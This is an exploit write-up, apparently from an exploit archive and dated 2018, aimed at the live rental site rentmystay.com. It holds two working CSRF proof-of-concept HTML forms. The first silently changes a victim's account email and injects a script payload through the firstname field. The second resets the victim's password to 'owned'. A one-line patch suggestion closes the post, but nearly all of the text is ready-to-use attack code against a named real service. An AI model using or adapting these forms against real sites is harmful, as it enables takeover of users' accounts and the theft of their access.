|\        /|  |  --------  |\        /| -------/  |---------/
| \      / |  |     |      | \      / |       /   |        /
|  \    /  |  |     |      |  \    /  |      /    |       /
|   \  /   |  |     |      |   \  /   |     /     |      /
|    \/    |  |     |      |    \/    |    /      |     /
|          |  |     |      |          |   /       |----/
|          |  |     |      |          |  /-----   |    \
|          |  |     |      |          |       /   |     \
|          |  |     |      |          |      /    |      \
|          |  |     |      |          |     /     |       \
|          |  |     |      |          |    /      |        \
|          |  |     |      |          |   /       |         \
|          |  |     |      |          |  /        |          \ @mitm3r
-----------------------------------------------------------------------------------------------
Site: https://www.rentmystay.com/
-----------------------------------------------------------------------------------------------

######################
# Exploit Title : Rentmystay CSRF + XSS account takeover
# Exploit Author : mitm3r
# Contact: [email protected]
# Vendor Homepage : https://www.rentmystay.com/
# Tested On : Windows 10 / Linux mint
######################
# Target:
https://www.rentmystay.com/

# Vulnerable link 1
https://www.rentmystay.com/account/account_settings [TAKEOVER WITH EMAIL]

#Exploit 

<html>
  <body>
    <form action="https://www.rentmystay.com/account/account_settings" method="POST">
      <input type="hidden" name="settings_email" value="[email protected]" />
      <input type="hidden" name="contact_num" value="9979608585" />
      <input type="hidden" name="settings_firstname" value="attacker"><script>alert('Owned')</script>" />
      <input type="hidden" name="settings_lastname" value="Attacker" />
      <input type="hidden" name="settings_dob_month" value="" />
      <input type="hidden" name="settings_dob_day" value="" />
      <input type="hidden" name="settings_dob_year" value="" />
      <input type="hidden" name="settings_gender" value="" />
      <input type="hidden" name="occupation" value="tester" />
      <input type="hidden" name="interests" value="" />
      <input type="hidden" name="work" value="" />
      <input type="hidden" name="education" value="" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="settings_country" value="in" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

# Vulnerable link 2
https://www.rentmystay.com/account/account-password [TAKEOVER WITH PASSWORD]

#Exploit

<html>
  <body>
    <form action="https://www.rentmystay.com/account/account-password" method="POST">
      <input type="hidden" name="password_new_password" value="owned" />
      <input type="hidden" name="password_retype_new_password" value="owned" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

# Fix/Patch

Use Anti-CSRF token in the website and for Password takeover CSRF at least ask for 'Current password' in password change form.

# siph0n [2018-12-10]